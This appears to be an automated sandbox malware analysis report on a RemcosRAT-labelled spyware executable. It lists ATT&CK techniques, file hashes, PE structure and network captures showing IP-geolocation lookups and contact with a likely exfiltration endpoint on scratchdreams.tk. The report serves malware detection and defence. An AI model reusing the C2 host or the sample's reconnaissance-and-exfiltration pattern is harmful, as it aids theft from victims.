        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Software Packing | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

        Source | Detection | Scanner | Label
        PT98765445670009.scr.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.RemcosRAT
        PT98765445670009.scr.exe | 60% | Virustotal |
        PT98765445670009.scr.exe | 100% | Avira | HEUR/AGEN.1309740
        PT98765445670009.scr.exe | 100% | Joe Sandbox ML |
        No Antivirus matches
        No Antivirus matches

        Source | Detection | Scanner | Label
        reallyfreegeoip.org | 1% | Virustotal |
        scratchdreams.tk | 6% | Virustotal |
        checkip.dyndns.com | 0% | Virustotal |
        checkip.dyndns.org | 0% | Virustotal |

        Source | Detection | Scanner | Label
        http://checkip.dyndns.org/ | 0% | URL Reputation | safe
        http://checkip.dyndns.org/q | 0% | URL Reputation | safe
        http://reallyfreegeoip.org | 0% | URL Reputation | safe
        https://reallyfreegeoip.org | 0% | URL Reputation | safe
        http://checkip.dyndns.org | 0% | URL Reputation | safe
        http://checkip.dyndns.com | 0% | URL Reputation | safe
        https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
        https://scratchdreams.tk | 0% | Avira URL Cloud | safe
        https://reallyfreegeoip.org/xml/102.165.48.43 | 0% | Avira URL Cloud | safe
        http://crl.micro2G | 0% | Avira URL Cloud | safe
        https://reallyfreegeoip.org/xml/102.165.48.43$ | 0% | Avira URL Cloud | safe
        https://scratchdreams.tk/_send_.php?TS | 0% | Avira URL Cloud | safe
        http://scratchdreams.tk | 0% | Avira URL Cloud | safe
        https://scratchdreams.tk/_send_.php?TS | 1% | Virustotal |
        http://scratchdreams.tk | 6% | Virustotal |
        https://scratchdreams.tk | 14% | Virustotal |

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        reallyfreegeoip.org | 172.67.177.134 | true | false | | unknown
        scratchdreams.tk | 104.21.27.85 | true | false | | unknown
        checkip.dyndns.com | 193.122.6.168 | true | false | | unknown
        checkip.dyndns.org | unknown | unknown | true | | unknown

        Name | Malicious | Antivirus Detection | Reputation
        http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
        https://reallyfreegeoip.org/xml/102.165.48.43 | false | Avira URL Cloud: safe | unknown
        https://scratchdreams.tk/_send_.php?TS | false | 1%, Virustotal; Avira URL Cloud: safe | unknown

          IP | Domain | Country | ASN | ASN Name | Malicious
          193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
          172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
          104.21.27.85 | scratchdreams.tk | United States | 13335 | CLOUDFLARENETUS | false

          Joe Sandbox version: 40.0.0 Tourmaline
          Analysis ID: 1416398
          Start date and time: 2024-03-27 11:23:11 +01:00
          Joe Sandbox product: CloudBasic
          Overall analysis duration: 0h 8m 15s
          Hypervisor based Inspection enabled: false
          Report type: full
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed: 17
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Sample name: PT98765445670009.scr.exe
          Detection: MAL
          Classification: mal100.troj.spyw.evad.winEXE@3/1@3/3
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 97%
          • Number of executed functions: 106
          • Number of non-executed functions: 39
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.

          Time | Type | Description
          11:24:04 | API Interceptor | 12232820x Sleep call for process: PT98765445670009.scr.exe modified
                                                Process:C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):706
                                                Entropy (8bit):5.349842958726647
                                                Encrypted:false
                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKharkvoDLI4MWuCq1KDLI4Mq92n4M6:ML9E4KlKDE4KhKiKhIE4Kx1qE4x84j
                                                MD5:A29F1F0983CFE0767B56BD3F32906196
                                                SHA1:A38543CAD5E151383FA945FF880856DC502A1224
                                                SHA-256:B892C3A6D2059FF69822E3A0003923BE0C0B2259C0E4904E30BB10C3D6E575F6
                                                SHA-512:FF52BC638E135EB070B6291808FE57FE8F2A37BB9F32DF2D6A885B30CC37268237A110E419975F19FB08878544787FA9D6A0AA07DC6911E08FBF52155F64DE42
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.2680634848839585
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:PT98765445670009.scr.exe
                                                File size:638'464 bytes
                                                MD5:90a34e7d570fa7c219eb5f1f193611ba
                                                SHA1:0d5d3955b04174b8f21c7bdd8d80ff21507e409c
                                                SHA256:301271b7db09d4769df8953807ea16c44578a4c4b92ef50f24da27c144f95522
                                                SHA512:75177b9ddf945e4dc46fb20174385faddfc569ea99cc095d1e1f9f4a96b9accc7dfcc1f6a1bd15d5740438e8ef63784ce870dfb3ea8d8c5387cc652324ace955
                                                SSDEEP:12288:npahc5sgNxUQx/rYquAfVCto8UHv/9EeRxDVl5nX:nZsgbFkq2tNUHDFVXX
                                                TLSH:AAD49D2033FC522AE2BF4B70E97940940BB6BE075EA6D35E489135DE0DB37818A53767
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#1................0.............n.... ........@.. ....................................@................................
                                                Icon Hash:526c6a52d0e4f047
                                                Entrypoint:0x49bc6e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xF9CC3123 [Sat Oct 21 21:18:27 2102 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9bc1c | 0x4f | .text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9c000 | 0x1b7c | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9e000 | 0xc | .reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x99c74 | 0x99e00 | 142b70b6afb38c0d6ce5233ad81a773a | False | 0.6303072324329814 | data | 7.276750369053607 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x9c000 | 0x1b7c | 0x1c00 | de75c8118bc1bf4ad3c303a622710081 | False | 0.3462611607142857 | data | 5.574966851848031 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x9e000 | 0xc | 0x200 | 8f380dc079a03d92d08433751817a386 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x9c160 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.2675891181988743
RT_ICON | 0x9d208 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5106382978723404
RT_GROUP_ICON | 0x9d670 | 0x22 | data | | | 0.9411764705882353
RT_VERSION | 0x9d694 | 0x2fc | data | | | 0.43717277486910994
RT_MANIFEST | 0x9d990 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 27, 2024 11:24:05.195822954 CET | 50276 | 53 | 192.168.2.7 | 1.1.1.1
Mar 27, 2024 11:24:05.290826082 CET | 53 | 50276 | 1.1.1.1 | 192.168.2.7
Mar 27, 2024 11:24:05.955574036 CET | 51311 | 53 | 192.168.2.7 | 1.1.1.1
Mar 27, 2024 11:24:06.051738977 CET | 53 | 51311 | 1.1.1.1 | 192.168.2.7
Mar 27, 2024 11:24:13.858851910 CET | 56212 | 53 | 192.168.2.7 | 1.1.1.1
Mar 27, 2024 11:24:14.198926926 CET | 53 | 56212 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 27, 2024 11:24:05.195822954 CET | 192.168.2.7 | 1.1.1.1 | 0xd2d4 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Mar 27, 2024 11:24:05.955574036 CET | 192.168.2.7 | 1.1.1.1 | 0x2cba | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Mar 27, 2024 11:24:13.858851910 CET | 192.168.2.7 | 1.1.1.1 | 0xa1d1 | Standard query (0) | scratchdreams.tk | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 27, 2024 11:24:05.290826082 CET | 1.1.1.1 | 192.168.2.7 | 0xd2d4 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 27, 2024 11:24:05.290826082 CET | 1.1.1.1 | 192.168.2.7 | 0xd2d4 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Mar 27, 2024 11:24:05.290826082 CET | 1.1.1.1 | 192.168.2.7 | 0xd2d4 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Mar 27, 2024 11:24:05.290826082 CET | 1.1.1.1 | 192.168.2.7 | 0xd2d4 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Mar 27, 2024 11:24:05.290826082 CET | 1.1.1.1 | 192.168.2.7 | 0xd2d4 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Mar 27, 2024 11:24:05.290826082 CET | 1.1.1.1 | 192.168.2.7 | 0xd2d4 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Mar 27, 2024 11:24:06.051738977 CET | 1.1.1.1 | 192.168.2.7 | 0x2cba | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Mar 27, 2024 11:24:06.051738977 CET | 1.1.1.1 | 192.168.2.7 | 0x2cba | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Mar 27, 2024 11:24:14.198926926 CET | 1.1.1.1 | 192.168.2.7 | 0xa1d1 | No error (0) | scratchdreams.tk | | 104.21.27.85 | A (IP address) | IN (0x0001) | false
Mar 27, 2024 11:24:14.198926926 CET | 1.1.1.1 | 192.168.2.7 | 0xa1d1 | No error (0) | scratchdreams.tk | | 172.67.169.18 | A (IP address) | IN (0x0001) | false
                                                • reallyfreegeoip.org
                                                • scratchdreams.tk
                                                • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 193.122.6.168 | 80 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
Timestamp | Bytes transferred | Direction | Data
Mar 27, 2024 11:24:05.501516104 CET | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
Mar 27, 2024 11:24:05.681735992 CET | 322 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:05 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 6741e569576b125a69d17c6ebb747f04
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>
Mar 27, 2024 11:24:05.712584972 CET | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
Mar 27, 2024 11:24:05.893754959 CET | 322 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:05 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: a387839ce3bafaace5cc4171584b80fe
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>
Mar 27, 2024 11:24:06.802086115 CET | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
Mar 27, 2024 11:24:06.982444048 CET | 322 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:06 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: f603bcc5cdb55dea973ca6099626eacf
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.7 | 49702 | 193.122.6.168 | 80 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Mar 27, 2024 11:24:07.900430918 CET | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Mar 27, 2024 11:24:08.080908060 CET | 322 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:07 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 751c978a30d2fc8d3421c5ea9b72c9d8
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.7 | 49704 | 193.122.6.168 | 80 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Mar 27, 2024 11:24:09.032620907 CET | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Mar 27, 2024 11:24:09.214004040 CET | 322 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:09 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 3b42f5669eae4d64dff08b8b4b640465
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.7 | 49706 | 193.122.6.168 | 80 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Mar 27, 2024 11:24:10.149310112 CET | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Mar 27, 2024 11:24:10.334887981 CET | 322 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 4563f6d065799dae82b35789f0be3f25
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.7 | 49708 | 193.122.6.168 | 80 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Mar 27, 2024 11:24:10.967328072 CET | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Mar 27, 2024 11:24:11.151983023 CET | 322 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:11 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 0286eaba19cfcc1aeffa75199429ad1b
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.7 | 49710 | 193.122.6.168 | 80 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Mar 27, 2024 11:24:12.108155012 CET | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Mar 27, 2024 11:24:12.289089918 CET | 322 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:12 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: bfbfb4924607b906eafbac6e805c73ad
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.7 | 49712 | 193.122.6.168 | 80 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Mar 27, 2024 11:24:13.213402033 CET | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Mar 27, 2024 11:24:13.397728920 CET | 322 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:13 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: d3f78e6bac064e0a0dfe851d97092180
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.7 | 49700 | 172.67.177.134 | 443 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-03-27 10:24:06 UTC | 86 | OUT | GET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:06 UTC | 693 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:06 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:06 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bqwVxyHKGQLrH9nRjvM4kUskMrFQufv2rqcNG2tPxm3Q9Fu22PbAtTggXrCcX4yBFwLBizepH34RyclEZhwvnmJAQ7RJhurZZW3rZIH4bgKO%2FBCo2i4Fub2OnO%2F7UeLjaD9cJpcS"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab383f832419-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:06 UTC | 366 | IN | Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.7 | 49701 | 172.67.177.134 | 443 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-03-27 10:24:07 UTC | 62 | OUT | GET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-03-27 10:24:07 UTC | 701 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:07 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:07 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFpabAWoOODQu%2BLmL2T%2Bp1T2SES1iAivdh72WDuBUoJ59gO4Q0ikIbO2JYZ%2FsqccNyDMZn7z7ObtwBqxy4Tf092DsTcucS7ZaP4yHd8bIIAeDuGuPgvSI%2Fl%2B3Ab6Fg0330C%2BaMyU"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab3e08028263-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:07 UTC | 366 | IN | Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.7 | 49703 | 172.67.177.134 | 443 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-03-27 10:24:08 UTC | 62 | OUT | GET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-03-27 10:24:08 UTC | 703 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:08 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KN%2FjHI4Yj%2F0GUwAAuXAhF%2FEv4Tba97m%2B6Q2oWBzZiUK1Ew2iNzQEr4VBW7k0HvwdMwiJzDF4dvCECK%2FMCAYHuZTwN6TQVGAWzWAuJIBRhc9Wb4cl5BcR%2BUpGNPgu2osnuUc%2BPhcl"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab44e9cc584e-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:08 UTC | 366 | IN | Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.7 | 49705 | 172.67.177.134 | 443 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
